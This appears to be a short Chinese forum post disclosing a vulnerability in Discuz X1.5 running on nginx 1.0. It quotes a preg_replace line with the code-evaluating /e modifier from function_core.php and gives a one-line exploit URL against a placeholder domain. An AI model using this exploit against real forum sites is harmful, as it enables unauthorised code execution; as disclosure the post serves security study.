作者:晴天小铸
测试环境:discuz X1.5+nginx 1.0
漏洞文件source/function/function_core.php,代码:
$_G['setting']['domain']['app']['default'] && $content = preg_replace("/<a href="([^"]+)"/e", "rewriteoutput('site_default', 0, '".$_G['setting']['domain']['app']['default'].$port.$_G['siteroot']."', '\1')", $content);
利用代码:
http://www.xxx.com/forum.php/admin.php’/DDDDDDD.php
Comments